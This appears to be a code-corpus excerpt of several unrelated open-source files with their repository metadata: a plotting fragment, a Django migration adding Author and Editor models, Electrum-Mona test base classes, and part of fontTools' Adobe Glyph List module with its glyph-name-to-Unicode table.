ax.xaxis.set_major_formatter(FuncFormatter(scale2)) plt.savefig('heatmap.pdf')
Evolving-AI-Lab/innovation-engine
sferes/modules/map_elite/plot_map.py
Python
mit
1,994
# -*- coding: utf-8 -*- # Generated by Django 1.9 on 2016-01-12 08:58 from __future__ import unicode_literals from django.conf import settings import django.contrib.auth.models from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ('weblog', '0005_auto_20160112_0956'), ] operations = [ migrations.CreateModel( name='Author', fields=[ ('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, 'verbose_name_plural': 'users', 'verbose_name': 'user', }, bases=('users.user',), managers=[ ('objects', django.contrib.auth.models.UserManager()), ], ), migrations.CreateModel( name='Editor', fields=[ ('author_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='weblog.Author')), ], options={ 'abstract': False, 'verbose_name_plural': 'users', 'verbose_name': 'user', }, bases=('weblog.author',), managers=[ ('objects', django.contrib.auth.models.UserManager()), ], ), ]
drxos/kuiqblog
weblog/migrations/0006_author_editor.py
Python
bsd-3-clause
1,641
import unittest import threading import tempfile import shutil import electrum_mona import electrum_mona.logging from electrum_mona import constants # Set this locally to make the test suite run faster. # If set, unit tests that would normally test functions with multiple implementations, # will only be run once, using the fastest implementation. # e.g. libsecp256k1 vs python-ecdsa. pycryptodomex vs pyaes. FAST_TESTS = False electrum_mona.logging._configure_stderr_logging() # some unit tests are modifying globals... class SequentialTestCase(unittest.TestCase): test_lock = threading.Lock() def setUp(self): super().setUp() self.test_lock.acquire() def tearDown(self): super().tearDown() self.test_lock.release() class ElectrumTestCase(SequentialTestCase): """Base class for our unit tests.""" def setUp(self): super().setUp() self.electrum_path = tempfile.mkdtemp() def tearDown(self): super().tearDown() shutil.rmtree(self.electrum_path) class TestCaseForTestnet(ElectrumTestCase): @classmethod def setUpClass(cls): super().setUpClass() constants.set_testnet() @classmethod def tearDownClass(cls): super().tearDownClass() constants.set_mainnet()
wakiyamap/electrum-mona
electrum_mona/tests/__init__.py
Python
mit
1,307
# -*- coding: utf-8 -*- # The tables below are taken from # https://github.com/adobe-type-tools/agl-aglfn/raw/4036a9ca80a62f64f9de4f7321a9a045ad0ecfd6/glyphlist.txt # and # https://github.com/adobe-type-tools/agl-aglfn/raw/4036a9ca80a62f64f9de4f7321a9a045ad0ecfd6/aglfn.txt """ Interface to the Adobe Glyph List This module exists to convert glyph names from the Adobe Glyph List to their Unicode equivalents. Example usage: >>> from fontTools.agl import toUnicode >>> toUnicode("nahiragana") 'な' It also contains two dictionaries, ``UV2AGL`` and ``AGL2UV``, which map from Unicode codepoints to AGL names and vice versa: >>> import fontTools >>> fontTools.agl.UV2AGL[ord("?")] 'question' >>> fontTools.agl.AGL2UV["wcircumflex"] 373 This is used by fontTools when it has to construct glyph names for a font which doesn't include any (e.g. format 3.0 post tables). """ from fontTools.misc.py23 import tostr import re _aglText = """\ # ----------------------------------------------------------- # Copyright 2002-2019 Adobe (http://www.adobe.com/). # # Redistribution and use in source and binary forms, with or # without modification, are permitted provided that the # following conditions are met: # # Redistributions of source code must retain the above # copyright notice, this list of conditions and the following # disclaimer. # # Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials # provided with the distribution. # # Neither the name of Adobe nor the names of its contributors # may be used to endorse or promote products derived from this # software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND # CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT # NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) # HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ----------------------------------------------------------- # Name: Adobe Glyph List # Table version: 2.0 # Date: September 20, 2002 # URL: https://github.com/adobe-type-tools/agl-aglfn # # Format: two semicolon-delimited fields: # (1) glyph name--upper/lowercase letters and digits # (2) Unicode scalar value--four uppercase hexadecimal digits # A;0041 AE;00C6 AEacute;01FC AEmacron;01E2 AEsmall;F7E6 Aacute;00C1 Aacutesmall;F7E1 Abreve;0102 Abreveacute;1EAE Abrevecyrillic;04D0 Abrevedotbelow;1EB6 Abrevegrave;1EB0 Abrevehookabove;1EB2 Abrevetilde;1EB4 Acaron;01CD Acircle;24B6 Acircumflex;00C2 Acircumflexacute;1EA4 Acircumflexdotbelow;1EAC Acircumflexgrave;1EA6 Acircumflexhookabove;1EA8 Acircumflexsmall;F7E2 Acircumflextilde;1EAA Acute;F6C9 Acutesmall;F7B4 Acyrillic;0410 Adblgrave;0200 Adieresis;00C4 Adieresiscyrillic;04D2 Adieresismacron;01DE Adieresissmall;F7E4 Adotbelow;1EA0 Adotmacron;01E0 Agrave;00C0 Agravesmall;F7E0 Ahookabove;1EA2 Aiecyrillic;04D4 Ainvertedbreve;0202 Alpha;0391 Alphatonos;0386 Amacron;0100 Amonospace;FF21 Aogonek;0104 Aring;00C5 Aringacute;01FA Aringbelow;1E00 Aringsmall;F7E5 Asmall;F761 Atilde;00C3 Atildesmall;F7E3 Aybarmenian;0531 B;0042 Bcircle;24B7 Bdotaccent;1E02 Bdotbelow;1E04 Becyrillic;0411 Benarmenian;0532 Beta;0392 Bhook;0181 Blinebelow;1E06 Bmonospace;FF22 Brevesmall;F6F4 Bsmall;F762 Btopbar;0182 C;0043 Caarmenian;053E Cacute;0106 Caron;F6CA Caronsmall;F6F5 Ccaron;010C Ccedilla;00C7 Ccedillaacute;1E08 Ccedillasmall;F7E7 Ccircle;24B8 Ccircumflex;0108 Cdot;010A Cdotaccent;010A Cedillasmall;F7B8 Chaarmenian;0549 Cheabkhasiancyrillic;04BC Checyrillic;0427 Chedescenderabkhasiancyrillic;04BE Chedescendercyrillic;04B6 Chedieresiscyrillic;04F4 Cheharmenian;0543 Chekhakassiancyrillic;04CB Cheverticalstrokecyrillic;04B8 Chi;03A7 Chook;0187 Circumflexsmall;F6F6 Cmonospace;FF23 Coarmenian;0551 Csmall;F763 D;0044 DZ;01F1 DZcaron;01C4 Daarmenian;0534 Dafrican;0189 Dcaron;010E Dcedilla;1E10 Dcircle;24B9 Dcircumflexbelow;1E12 Dcroat;0110 Ddotaccent;1E0A Ddotbelow;1E0C Decyrillic;0414 Deicoptic;03EE Delta;2206 Deltagreek;0394 Dhook;018A Dieresis;F6CB DieresisAcute;F6CC DieresisGrave;F6CD Dieresissmall;F7A8 Digammagreek;03DC Djecyrillic;0402 Dlinebelow;1E0E Dmonospace;FF24 Dotaccentsmall;F6F7 Dslash;0110 Dsmall;F764 Dtopbar;018B Dz;01F2 Dzcaron;01C5 Dzeabkhasiancyrillic;04E0 Dzecyrillic;0405 Dzhecyrillic;040F E;0045 Eacute;00C9 Eacutesmall;F7E9 Ebreve;0114 Ecaron;011A Ecedillabreve;1E1C Echarmenian;0535 Ecircle;24BA Ecircumflex;00CA Ecircumflexacute;1EBE Ecircumflexbelow;1E18 Ecircumflexdotbelow;1EC6 Ecircumflexgrave;1EC0 Ecircumflexhookabove;1EC2 Ecircumflexsmall;F7EA Ecircumflextilde;1EC4 Ecyrillic;0404 Edblgrave;0204 Edieresis;00CB Edieresissmall;F7EB Edot;0116 Edotaccent;0116 Edotbelow;1EB8 Efcyrillic;0424 Egrave;00C8 Egravesmall;F7E8 Eharmenian;0537 Ehookabove;1EBA Eightroman;2167 Einvertedbreve;0206 Eiotifiedcyrillic;0464 Elcyrillic;041B Elevenroman;216A Emacron;0112 Emacronacute;1E16 Emacrongrave;1E14 Emcyrillic;041C Emonospace;FF25 Encyrillic;041D Endescendercyrillic;04A2 Eng;014A Enghecyrillic;04A4 Enhookcyrillic;04C7 Eogonek;0118 Eopen;0190 Epsilon;0395 Epsilontonos;0388 Ercyrillic;0420 Ereversed;018E Ereversedcyrillic;042D Escyrillic;0421 Esdescendercyrillic;04AA Esh;01A9 Esmall;F765 Eta;0397 Etarmenian;0538 Etatonos;0389 Eth;00D0 Ethsmall;F7F0 Etilde;1EBC Etildebelow;1E1A Euro;20AC Ezh;01B7 Ezhcaron;01EE Ezhreversed;01B8 F;0046 Fcircle;24BB Fdotaccent;1E1E Feharmenian;0556 Feicoptic;03E4 Fhook;0191 Fitacyrillic;0472 Fiveroman;2164 Fmonospace;FF26 Fourroman;2163 Fsmall;F766 G;0047 GBsquare;3387 Gacute;01F4 Gamma;0393 Gammaafrican;0194 Gangiacoptic;03EA Gbreve;011E Gcaron;01E6 Gcedilla;0122 Gcircle;24BC Gcircumflex;011C Gcommaaccent;0122 Gdot;0120 Gdotaccent;0120 Gecyrillic;0413 Ghadarmenian;0542 Ghemiddlehookcyrillic;0494 Ghestrokecyrillic;0492 Gheupturncyrillic;0490 Ghook;0193 Gimarmenian;0533 Gjecyrillic;0403 Gmacron;1E20 Gmonospace;FF27 Grave;F6CE Gravesmall;F760 Gsmall;F767 Gsmallhook;029B Gstroke;01E4 H;0048 H18533;25CF H18543;25AA H18551;25AB H22073;25A1 HPsquare;33CB Haabkhasiancyrillic;04A8 Hadescendercyrillic;04B2 Hardsigncyrillic;042A Hbar;0126 Hbrevebelow;1E2A Hcedilla;1E28 Hcircle;24BD Hcircumflex;0124 Hdieresis;1E26 Hdotaccent;1E22 Hdotbelow;1E24 Hmonospace;FF28 Hoarmenian;0540 Horicoptic;03E8 Hsmall;F768 Hungarumlaut;F6CF Hungarumlautsmall;F6F8 Hzsquare;3390 I;0049 IAcyrillic;042F IJ;0132 IUcyrillic;042E Iacute;00CD Iacutesmall;F7ED Ibreve;012C Icaron;01CF Icircle;24BE Icircumflex;00CE Icircumflexsmall;F7EE Icyrillic;0406 Idblgrave;0208 Idieresis;00CF Idieresisacute;1E2E Idieresiscyrillic;04E4 Idieresissmall;F7EF Idot;0130 Idotaccent;0130 Idotbelow;1ECA Iebrevecyrillic;04D6 Iecyrillic;0415 Ifraktur;2111 Igrave;00CC Igravesmall;F7EC Ihookabove;1EC8 Iicyrillic;0418 Iinvertedbreve;020A Iishortcyrillic;0419 Imacron;012A Imacroncyrillic;04E2 Imonospace;FF29 Iniarmenian;053B Iocyrillic;0401 Iogonek;012E Iota;0399 Iotaafrican;0196 Iotadieresis;03AA Iotatonos;038A Ismall;F769 Istroke;0197 Itilde;0128 Itildebelow;1E2C Izhitsacyrillic;0474 Izhitsadblgravecyrillic;0476 J;004A Jaarmenian;0541 Jcircle;24BF Jcircumflex;0134 Jecyrillic;0408 Jheharmenian;054B Jmonospace;FF2A Jsmall;F76A K;004B KBsquare;3385 KKsquare;33CD Kabashkircyrillic;04A0 Kacute;1E30 Kacyrillic;041A Kadescendercyrillic;049A Kahookcyrillic;04C3 Kappa;039A Kastrokecyrillic;049E Kaverticalstrokecyrillic;049C Kcaron;01E8 Kcedilla;0136 Kcircle;24C0 Kcommaaccent;0136 Kdotbelow;1E32 Keharmenian;0554 Kenarmenian;053F Khacyrillic;0425 Kheicoptic;03E6 Khook;0198 Kjecyrillic;040C Klinebelow;1E34 Kmonospace;FF2B Koppacyrillic;0480 Koppagreek;03DE Ksicyrillic;046E Ksmall;F76B L;004C LJ;01C7 LL;F6BF Lacute;0139 Lambda;039B Lcaron;013D Lcedilla;013B Lcircle;24C1 Lcircumflexbelow;1E3C Lcommaaccent;013B Ldot;013F Ldotaccent;013F Ldotbelow;1E36 Ldotbelowmacron;1E38 Liwnarmenian;053C Lj;01C8 Ljecyrillic;0409 Llinebelow;1E3A Lmonospace;FF2C Lslash;0141 Lslashsmall;F6F9 Lsmall;F76C M;004D MBsquare;3386 Macron;F6D0 Macronsmall;F7AF Macute;1E3E Mcircle;24C2 Mdotaccent;1E40 Mdotbelow;1E42 Menarmenian;0544 Mmonospace;FF2D Msmall;F76D Mturned;019C Mu;039C N;004E NJ;01CA Nacute;0143 Ncaron;0147 Ncedilla;0145 Ncircle;24C3 Ncircumflexbelow;1E4A Ncommaaccent;0145 Ndotaccent;1E44 Ndotbelow;1E46 Nhookleft;019D Nineroman;2168 Nj;01CB Njecyrillic;040A Nlinebelow;1E48 Nmonospace;FF2E Nowarmenian;0546 Nsmall;F76E Ntilde;00D1 Ntildesmall;F7F1 Nu;039D O;004F OE;0152 OEsmall;F6FA Oacute;00D3 Oacutesmall;F7F3 Obarredcyrillic;04E8 Obarreddieresiscyrillic;04EA Obreve;014E Ocaron;01D1 Ocenteredtilde;019F Ocircle;24C4 Ocircumflex;00D4 Ocircumflexacute;1ED0 Ocircumflexdotbelow;1ED8 Ocircumflexgrave;1ED2 Ocircumflexhookabove;1ED4 Ocircumflexsmall;F7F4 Ocircumflextilde;1ED6 Ocyrillic;041E Odblacute;0150 Odblgrave;020C Odieresis;00D6 Odieresiscyrillic;04E6 Odieresissmall;F7F6 Odotbelow;1ECC Ogoneksmall;F6FB Ograve;00D2 Ogravesmall;F7F2 Oharmenian;0555 Ohm;2126 Ohookabove;1ECE Ohorn;01A0 Ohornacute;1EDA Ohorndotbelow;1EE2 Ohorngrave;1EDC Ohornhookabove;1EDE Ohorntilde;1EE0 Ohungarumlaut;0150 Oi;01A2 Oinvertedbreve;020E Omacron;014C Omacronacute;1E52 Omacrongrave;1E50 Omega;2126 Omegacyrillic;0460 Omegagreek;03A9 Omegaroundcyrillic;047A Omegatitlocyrillic;047C Omegatonos;038F Omicron;039F Omicrontonos;038C Omonospace;FF2F Oneroman;2160 Oogonek;01EA Oogonekmacron;01EC Oopen;0186 Oslash;00D8 Oslashacute;01FE Oslashsmall;F7F8 Osmall;F76F Ostrokeacute;01FE Otcyrillic;047E Otilde;00D5 Otildeacute;1E4C Otildedieresis;1E4E Otildesmall;F7F5 P;0050 Pacute;1E54 Pcircle;24C5 Pdotaccent;1E56 Pecyrillic;041F Peharmenian;054A Pemiddlehookcyrillic;04A6 Phi;03A6 Phook;01A4 Pi;03A0 Piwrarmenian;0553 Pmonospace;FF30 Psi;03A8 Psicyrillic;0470 Psmall;F770 Q;0051 Qcircle;24C6 Qmonospace;FF31 Qsmall;F771 R;0052 Raarmenian;054C Racute;0154 Rcaron;0158 Rcedilla;0156 Rcircle;24C7 Rcommaaccent;0156 Rdblgrave;0210 Rdotaccent;1E58 Rdotbelow;1E5A Rdotbelowmacron;1E5C Reharmenian;0550 Rfraktur;211C Rho;03A1 Ringsmall;F6FC Rinvertedbreve;0212 Rlinebelow;1E5E Rmonospace;FF32 Rsmall;F772 Rsmallinverted;0281 Rsmallinvertedsuperior;02B6 S;0053 SF010000;250C SF020000;2514 SF030000;2510 SF040000;2518 SF050000;253C SF060000;252C SF070000;2534 SF080000;251C SF090000;2524 SF100000;2500 SF110000;2502 SF190000;2561 SF200000;2562 SF210000;2556 SF220000;2555 SF230000;2563 SF240000;2551 SF250000;2557 SF260000;255D SF270000;255C SF280000;255B SF360000;255E SF370000;255F SF380000;255A SF390000;2554 SF400000;2569 SF410000;2566 SF420000;2560 SF430000;2550 SF440000;256C SF450000;2567 SF460000;2568 SF470000;2564 SF480000;2565 SF490000;2559 SF500000;2558 SF510000;2552 SF520000;2553 SF530000;256B SF540000;256A Sacute;015A Sacutedotaccent;1E64 Sampigreek;03E0 Scaron;0160 Scarondotaccent;1E66 Scaronsmall;F6FD Scedilla;015E Schwa;018F Schwacyrillic;04D8 Schwadieresiscyrillic;04DA Scircle;24C8 Scircumflex;015C Scommaaccent;0218 Sdotaccent;1E60 Sdotbelow;1E62 Sdotbelowdotaccent;1E68 Seharmenian;054D Sevenroman;2166 Shaarmenian;0547 Shacyrillic;0428 Shchacyrillic;0429 Sheicoptic;03E2 Shhacyrillic;04BA Shimacoptic;03EC Sigma;03A3 Sixroman;2165 Smonospace;FF33 Softsigncyrillic;042C Ssmall;F773 Stigmagreek;03DA T;0054 Tau;03A4 Tbar;0166 Tcaron;0164 Tcedilla;0162 Tcircle;24C9 Tcircumflexbelow;1E70 Tcommaaccent;0162 Tdotaccent;1E6A Tdotbelow;1E6C Tecyrillic;0422 Tedescendercyrillic;04AC Tenroman;2169 Tetsecyrillic;04B4 Theta;0398 Thook;01AC Thorn;00DE Thornsmall;F7FE Threeroman;2162 Tildesmall;F6FE Tiwnarmenian;054F Tlinebelow;1E6E Tmonospace;FF34 Toarmenian;0539 Tonefive;01BC Tonesix;0184 Tonetwo;01A7 Tretroflexhook;01AE Tsecyrillic;0426 Tshecyrillic;040B Tsmall;F774 Twelveroman;216B Tworoman;2161 U;0055 Uacute;00DA Uacutesmall;F7FA Ubreve;016C Ucaron;01D3 Ucircle;24CA Ucircumflex;00DB Ucircumflexbelow;1E76 Ucircumflexsmall;F7FB Ucyrillic;0423 Udblacute;0170 Udblgrave;0214 Udieresis;00DC Udieresisacute;01D7 Udieresisbelow;1E72 Udieresiscaron;01D9 Udieresiscyrillic;04F0 Udieresisgrave;01DB Udieresismacron;01D5 Udieresissmall;F7FC Udotbelow;1EE4 Ugrave;00D9 Ugravesmall;F7F9 Uhookabove;1EE6 Uhorn;01AF Uhornacute;1EE8 Uhorndotbelow;1EF0 Uhorngrave;1EEA Uhornhookabove;1EEC Uhorntilde;1EEE Uhungarumlaut;0170 Uhungarumlautcyrillic;04F2 Uinvertedbreve;0216 Ukcyrillic;0478 Umacron;016A Umacroncyrillic;04EE Umacrondieresis;1E7A Umonospace;FF35 Uogonek;0172 Upsilon;03A5 Upsilon1;03D2 Upsilonacutehooksymbolgreek;03D3 Upsilonafrican;01B1 Upsilondieresis;03AB Upsilondieresishooksymbolgreek;03D4 Upsilonhooksymbol;03D2 Upsilontonos;038E Uring;016E Ushortcyrillic;040E Usmall;F775 Ustraightcyrillic;04AE Ustraightstrokecyrillic;04B0 Utilde;0168 Utildeacute;1E78 Utildebelow;1E74 V;0056 Vcircle;24CB Vdotbelow;1E7E Vecyrillic;0412 Vewarmenian;054E Vhook;01B2 Vmonospace;FF36 Voarmenian;0548 Vsmall;F776 Vtilde;1E7C W;0057 Wacute;1E82 Wcircle;24CC Wcircumflex;0174 Wdieresis;1E84 Wdotaccent;1E86 Wdotbelow;1E88 Wgrave;1E80 Wmonospace;FF37 Wsmall;F777 X;0058 Xcircle;24CD Xdieresis;1E8C Xdotaccent;1E8A Xeharmenian;053D Xi;039E Xmonospace;FF38 Xsmall;F778 Y;0059 Yacute;00DD Yacutesmall;F7FD Yatcyrillic;0462 Ycircle;24CE Ycircumflex;0176 Ydieresis;0178 Ydieresissmall;F7FF Ydotaccent;1E8E Ydotbelow;1EF4 Yericyrillic;042B Yerudieresiscyrillic;04F8 Ygrave;1EF2 Yhook;01B3 Yhookabove;1EF6 Yiarmenian;0545 Yicyrillic;0407 Yiwnarmenian;0552 Ymonospace;FF39 Ysmall;F779 Ytilde;1EF8 Yusbigcyrillic;046A Yusbigiotifiedcyrillic;046C Yuslittlecyrillic;0466 Yuslittleiotifiedcyrillic;0468 Z;005A Zaarmenian;0536 Zacute;0179 Zcaron;017D Zcaronsmall;F6FF Zcircle;24CF Zcircumflex;1E90 Zdot;017B Zdotaccent;017B Zdotbelow;1E92 Zecyrillic;0417 Zedescendercyrillic;0498 Zedieresiscyrillic;04DE Zeta;0396 Zhearmenian;053A Zhebrevecyrillic;04C1 Zhecyrillic;0416 Zhedescendercyrillic;0496 Zhedieresiscyrillic;04DC Zlinebelow;1E94 Zmonospace;FF3A Zsmall;F77A Zstroke;01B5 a;0061 aabengali;0986 aacute;00E1 aadeva;0906 aagujarati;0A86 aagurmukhi;0A06 aamatragurmukhi;0A3E aarusquare;3303 aavowelsignbengali;09BE aavowelsigndeva;093E aavowelsigngujarati;0ABE abbreviationmarkarmenian;055F abbreviationsigndeva;0970 abengali;0985 abopomofo;311A abreve;0103 abreveacute;1EAF abrevecyrillic;04D1 abrevedotbelow;1EB7 abrevegrave;1EB1 abrevehookabove;1EB3 abrevetilde;1EB5 acaron;01CE acircle;24D0 acircumflex;00E2 acircumflexacute;1EA5 acircumflexdotbelow;1EAD acircumflexgrave;1EA7 acircumflexhookabove;1EA9 acircumflextilde;1EAB acute;00B4 acutebelowcmb;0317 acutecmb;0301 acutecomb;0301 acutedeva;0954 acutelowmod;02CF acutetonecmb;0341 acyrillic;0430 adblgrave;0201 addakgurmukhi;0A71 adeva;0905 adieresis;00E4 adieresiscyrillic;04D3 adieresismacron;01DF adotbelow;1EA1 adotmacron;01E1 ae;00E6 aeacute;01FD aekorean;3150 aemacron;01E3 afii00208;2015 afii08941;20A4 afii10017;0410 afii10018;0411 afii10019;0412 afii10020;0413 afii10021;0414 afii10022;0415 afii10023;0401 afii10024;0416 afii10025;0417 afii10026;0418 afii10027;0419 afii10028;041A afii10029;041B afii10030;041C afii10031;041D afii10032;041E afii10033;041F afii10034;0420 afii10035;0421 afii10036;0422 afii10037;0423 afii10038;0424 afii10039;0425 afii10040;0426 afii10041;0427 afii10042;0428 afii10043;0429 afii10044;042A afii10045;042B afii10046;042C afii10047;042D afii10048;042E afii10049;042F afii10050;0490 afii10051;0402 afii10052;0403 afii10053;0404 afii10054;0405 afii10055;0406 afii10056;0407 afii10057;0408 afii10058;0409 afii10059;040A afii10060;040B afii10061;040C afii10062;040E afii10063;F6C4 afii10064;F6C5 afii10065;0430 afii10066;0431 afii10067;0432 afii10068;0433 afii10069;0434 afii10070;0435 afii10071;0451 afii10072;0436 afii10073;0437 afii10074;0438 afii10075;0439 afii10076;043A afii10077;043B afii10078;043C afii10079;043D afii10080;043E afii10081;043F afii10082;0440 afii10083;0441 afii10084;0442 afii10085;0443 afii10086;0444 afii10087;0445 afii10088;0446 afii10089;0447 afii10090;0448 afii10091;0449 afii10092;044A afii10093;044B afii10094;044C afii10095;044D afii10096;044E afii10097;044F afii10098;0491 afii10099;0452 afii10100;0453 afii10101;0454 afii10102;0455 afii10103;0456 afii10104;0457 afii10105;0458 afii10106;0459 afii10107;045A afii10108;045B afii10109;045C afii10110;045E afii10145;040F afii10146;0462 afii10147;0472 afii10148;0474 afii10192;F6C6 afii10193;045F afii10194;0463 afii10195;0473 afii10196;0475 afii10831;F6C7 afii10832;F6C8 afii10846;04D9 afii299;200E afii300;200F afii301;200D afii57381;066A afii57388;060C afii57392;0660 afii57393;0661 afii57394;0662 afii57395;0663 afii57396;0664 afii57397;0665 afii57398;0666 afii57399;0667 afii57400;0668 afii57401;0669 afii57403;061B afii57407;061F afii57409;0621 afii57410;0622 afii57411;0623 afii57412;0624 afii57413;0625 afii57414;0626 afii57415;0627 afii57416;0628 afii57417;0629 afii57418;062A afii57419;062B afii57420;062C afii57421;062D afii57422;062E afii57423;062F afii57424;0630 afii57425;0631 afii57426;0632 afii57427;0633 afii57428;0634 afii57429;0635 afii57430;0636 afii57431;0637 afii57432;0638 afii57433;0639 afii57434;063A afii57440;0640 afii57441;0641 afii57442;0642 afii57443;0643 afii57444;0644 afii57445;0645 afii57446;0646 afii57448;0648 afii57449;0649 afii57450;064A afii57451;064B afii57452;064C afii57453;064D afii57454;064E afii57455;064F afii57456;0650 afii57457;0651 afii57458;0652 afii57470;0647 afii57505;06A4 afii57506;067E afii57507;0686 afii57508;0698 afii57509;06AF afii57511;0679 afii57512;0688 afii57513;0691 afii57514;06BA afii57519;06D2 afii57534;06D5 afii57636;20AA afii57645;05BE afii57658;05C3 afii57664;05D0 afii57665;05D1 afii57666;05D2 afii57667;05D3 afii57668;05D4 afii57669;05D5 afii57670;05D6 afii57671;05D7 afii57672;05D8 afii57673;05D9 afii57674;05DA afii57675;05DB afii57676;05DC afii57677;05DD afii57678;05DE afii57679;05DF afii57680;05E0 afii57681;05E1 afii57682;05E2 afii57683;05E3 afii57684;05E4 afii57685;05E5 afii57686;05E6 afii57687;05E7 afii57688;05E8 afii57689;05E9 afii57690;05EA afii57694;FB2A afii57695;FB2B afii57700;FB4B afii57705;FB1F afii57716;05F0 afii57717;05F1 afii57718;05F2 afii57723;FB35 afii57793;05B4 afii57794;05B5 afii57795;05B6 afii57796;05BB afii57797;05B8 afii57798;05B7 afii57799;05B0 afii57800;05B2 afii57801;05B1 afii57802;05B3 afii57803;05C2 afii57804;05C1 afii57806;05B9 afii57807;05BC afii57839;05BD afii57841;05BF afii57842;05C0 afii57929;02BC afii61248;2105 afii61289;2113 afii61352;2116 afii61573;202C afii61574;202D afii61575;202E afii61664;200C afii63167;066D afii64937;02BD agrave;00E0 agujarati;0A85 agurmukhi;0A05 ahiragana;3042 ahookabove;1EA3 aibengali;0990 aibopomofo;311E aideva;0910 aiecyrillic;04D5 aigujarati;0A90 aigurmukhi;0A10 aimatragurmukhi;0A48 ainarabic;0639 ainfinalarabic;FECA aininitialarabic;FECB ainmedialarabic;FECC ainvertedbreve;0203 aivowelsignbengali;09C8 aivowelsigndeva;0948 aivowelsigngujarati;0AC8 akatakana;30A2 akatakanahalfwidth;FF71 akorean;314F alef;05D0 alefarabic;0627 alefdageshhebrew;FB30 aleffinalarabic;FE8E alefhamzaabovearabic;0623 alefhamzaabovefinalarabic;FE84 alefhamzabelowarabic;0625 alefhamzabelowfinalarabic;FE88 alefhebrew;05D0 aleflamedhebrew;FB4F alefmaddaabovearabic;0622 alefmaddaabovefinalarabic;FE82 alefmaksuraarabic;0649 alefmaksurafinalarabic;FEF0 alefmaksurainitialarabic;FEF3 alefmaksuramedialarabic;FEF4 alefpatahhebrew;FB2E alefqamatshebrew;FB2F aleph;2135 allequal;224C alpha;03B1 alphatonos;03AC amacron;0101 amonospace;FF41 ampersand;0026 ampersandmonospace;FF06 ampersandsmall;F726 amsquare;33C2 anbopomofo;3122 angbopomofo;3124 angkhankhuthai;0E5A angle;2220 anglebracketleft;3008 anglebracketleftvertical;FE3F anglebracketright;3009 anglebracketrightvertical;FE40 angleleft;2329 angleright;232A angstrom;212B anoteleia;0387 anudattadeva;0952 anusvarabengali;0982 anusvaradeva;0902 anusvaragujarati;0A82 aogonek;0105 apaatosquare;3300 aparen;249C apostrophearmenian;055A apostrophemod;02BC apple;F8FF approaches;2250 approxequal;2248 approxequalorimage;2252 approximatelyequal;2245 araeaekorean;318E araeakorean;318D arc;2312 arighthalfring;1E9A aring;00E5 aringacute;01FB aringbelow;1E01 arrowboth;2194 arrowdashdown;21E3 arrowdashleft;21E0 arrowdashright;21E2 arrowdashup;21E1 arrowdblboth;21D4 arrowdbldown;21D3 arrowdblleft;21D0 arrowdblright;21D2 arrowdblup;21D1 arrowdown;2193 arrowdownleft;2199 arrowdownright;2198 arrowdownwhite;21E9 arrowheaddownmod;02C5 arrowheadleftmod;02C2 arrowheadrightmod;02C3 arrowheadupmod;02C4 arrowhorizex;F8E7 arrowleft;2190 arrowleftdbl;21D0 arrowleftdblstroke;21CD arrowleftoverright;21C6 arrowleftwhite;21E6 arrowright;2192 arrowrightdblstroke;21CF arrowrightheavy;279E arrowrightoverleft;21C4 arrowrightwhite;21E8 arrowtableft;21E4 arrowtabright;21E5 arrowup;2191 arrowupdn;2195 arrowupdnbse;21A8 arrowupdownbase;21A8 arrowupleft;2196 arrowupleftofdown;21C5 arrowupright;2197 arrowupwhite;21E7 arrowvertex;F8E6 asciicircum;005E asciicircummonospace;FF3E asciitilde;007E asciitildemonospace;FF5E ascript;0251 ascriptturned;0252 asmallhiragana;3041 asmallkatakana;30A1 asmallkatakanahalfwidth;FF67 asterisk;002A asteriskaltonearabic;066D asteriskarabic;066D asteriskmath;2217 asteriskmonospace;FF0A asterisksmall;FE61 asterism;2042 asuperior;F6E9 asymptoticallyequal;2243 at;0040 atilde;00E3 atmonospace;FF20 atsmall;FE6B aturned;0250 aubengali;0994 aubopomofo;3120 audeva;0914 augujarati;0A94 augurmukhi;0A14 aulengthmarkbengali;09D7 aumatragurmukhi;0A4C auvowelsignbengali;09CC auvowelsigndeva;094C auvowelsigngujarati;0ACC avagrahadeva;093D aybarmenian;0561 ayin;05E2 ayinaltonehebrew;FB20 ayinhebrew;05E2 b;0062 babengali;09AC backslash;005C backslashmonospace;FF3C badeva;092C bagujarati;0AAC bagurmukhi;0A2C bahiragana;3070 bahtthai;0E3F bakatakana;30D0 bar;007C barmonospace;FF5C bbopomofo;3105 bcircle;24D1 bdotaccent;1E03 bdotbelow;1E05 beamedsixteenthnotes;266C because;2235 becyrillic;0431 beharabic;0628 behfinalarabic;FE90 behinitialarabic;FE91 behiragana;3079 behmedialarabic;FE92 behmeeminitialarabic;FC9F behmeemisolatedarabic;FC08 behnoonfinalarabic;FC6D bekatakana;30D9 benarmenian;0562 bet;05D1 beta;03B2 betasymbolgreek;03D0 betdagesh;FB31 betdageshhebrew;FB31 bethebrew;05D1 betrafehebrew;FB4C bhabengali;09AD bhadeva;092D bhagujarati;0AAD bhagurmukhi;0A2D bhook;0253 bihiragana;3073 bikatakana;30D3 bilabialclick;0298 bindigurmukhi;0A02 birusquare;3331 blackcircle;25CF blackdiamond;25C6 blackdownpointingtriangle;25BC blackleftpointingpointer;25C4 blackleftpointingtriangle;25C0 